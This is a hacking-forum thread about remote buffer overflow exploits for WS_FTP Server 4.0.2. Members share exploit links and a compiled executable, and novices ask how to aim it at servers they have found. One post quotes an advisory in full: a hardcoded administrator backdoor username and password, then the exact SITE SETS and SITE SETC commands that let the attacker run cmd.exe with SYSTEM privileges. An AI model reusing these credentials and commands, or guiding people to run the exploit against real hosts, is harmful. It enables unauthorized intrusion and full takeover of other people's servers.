WS_FTP Server <= 4.0.2 ALLO Remote overflow Exploit

http://www.k-otik.com/exploits/03.23.xp_ws...server2.cpp.php

another WS_FTP Server vulnerability !!

hey nicely found there m8 great job
but is there someone who can compile it.?
i can't cause i am still learning how to compile stuff

thanks for the link man

yeah niekos i know but i started learning yesterday and i am downloading knoppix as we speak
so i'm srry if i offended you or something :$ whas not my intention i am just here to learn

with lss i can compile this source, to much error...

So soon!? I'm gonna check the source...

too bad nobody hardly uses ws_ftp but nice indeed

could you please compile it for me
thx a lot .

Compiled fine in Visual Studio, I've uploaded the file and here is the link.

wsftp exploit

i appreciate that asuka.
i use gcc in windows to compile my exploits, and i have a good knowledge of c & cpp, but the gcc cpp compiler is a bit bitchy.

lol

Thanx for sharing this sploit. Never know when you come across someone that uses wsftp server

AsuKa

Thats the old one you are sharing...

I compiled it from the source that was posted "WS_FTP Server <= 4.0.2 ALLO Remote buffer overflow Exploit" So I dont think its the old one.

Edit: Doh, I uploaded the wrong one.
Ive replaced it with the current version, so anyone who d/l before
make sure to grab again.

hey thanks alot for this tool man but i have 1 question how do i use it? cause i don't understand the commandline (srry just learning everything i can, i am new :$ so srry if it's a stupid question)

thanks for the .exe

thx for the exploit. can be usefull.

I get much errors with compiling over cygwin. So i've to use it under linux ;(...But okay

this one should be hard to use cause

* NOTE:
* - The exploit assumes the user has a total file size limit. If the user only has
* a max number of files limit you will need to rewrite parts of this exploit for
* it to work.

if no limit was set than the exploit is worthless...

thnx dude

nice work but what port do we need 2 scan ?

Sp00ky, read my sticky at the top of the forum. "Learning to compile" shouldn't take more than 5 minutes. If you want to be a 'hacker', you should learn to code, not learn to compile sploits
We wouldn't have half as many problems if people could just take the code "as is", and do whatever is necessary to get the code working. I think those requesting compiles should come to earth - if you can't even compile the exploit, why on earth are you trying to own somebody with it? You'd be surprised how much info systems log about you - if you did manage to get it, there'd be more than enough info to place your ass in a jail cell for a few months. Do you agree?

So you just scan port 21.. But how u get username and pass then ??
(u have 2 give in the exploit) ?

cheers FloW

By the way new STAT command overflow exploit for WS_FTP Server <= 4.0.2 just came out. If you guys interested here is the link:
http://www.security.nnov.ru/files/xp_ws_ftp_server.zip

Did you hear about backdoor in this ftp server?
I got some info about it. Sounds like very usefull information:
"Description
~~~~~~~~~~~
Any local user or any remote user who can execute programs on the FTP server
as any user can start programs on the FTP server with the SYSTEM privilege.

Details
~~~~~~~
There are two WS_FTP Server options only the FTP system administrator can
change. When enabled a FTP system administrator can edit user-defined SITE
FTP commands. These user-defined SITE commands execute a program of the FTP
system admin's choice. To protect the FTP sites, these options can only be
controlled by a local FTP system administrator using the iftpmgr.exe
program. It's not possible for a remote FTP system admin to enable these
options through the iftpmgr.exe program. However, it's possible for a FTP
system administrator to enable these options with a special WS_FTP Server
SITE command. Ipswitch forgot to mask out the bits that enable these options
before saving the new Flags when it receives a new SITE SETS (Set Site
Options) command from a remote FTP system administrator.

A "remote" FTP system admin is any FTP system admin using FTP/TELNET to
connect to the server, which includes local users. If the remote user
doesn't have the FTP system admin password but can run a program on the FTP
server as any user, or if the user is a local user, the user can log in as
the FTP system administrator by using a backdoor.

FTP System Administrator backdoor: Any local user, or any remote user who
can run programs on the FTP server as any user, can log in as the FTP System
Administrator by using a backdoor.

RealName: Local Session Manager
Username: XXSESS_MGRYY
Password: X#1833

The user must have an IP equal to 127.0.0.1 and must connect to server IP
127.0.0.1 or the login will fail.

Exploit
~~~~~~~
Use telnet/ftp to log in as the FTP system admin or use the backdoor. Enable
remote editing of SITE cmds/events (exec files). This is off by default, but
can be enabled by a remote ftp admin. First use the SITE List Site Options
command:

SITE LSTC
220
C:\iFtpSvc<\t>C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>0<\t>1460<\t>0<\t>16384<\t>C:\iFtpSvc\Security<\t>0

<\t> means tab, or byte 0x09.

Write down the 2nd to 8th site options you find there. Change the 5th Flags
option by OR'ing it with 0x180. Now put the 2nd to 8th options on the next
line, each option separated by a tab, except for the first option right
after "SITE SETS" which should have a space just before it:

SITE SETS C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>384<\t>1460<\t>0<\t>16384
220 options set

Now iftpmgr.exe can be used to remotely control all site options. I'll show
how to manually add a SITE cmd we can use without using iftpmgr.exe. The
command to do that is:

SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
220 site command modified

<HostName> is the first name displayed before you log in to the FTP. 3V1L is
the name of the new SITE command. Flags = 16 means write output to the
screen.

SITE 3V1L
200-Command Started
200-yup
200 SITE command execution successful
"

what is the exact banner name of ws_ftp server? is it ws_ftp

thx qcred11

i have found some servers with this version but i don't understand the commands

can some exsplain too me why do u have too put in username and pass?

and what is sip and sport???

thanxs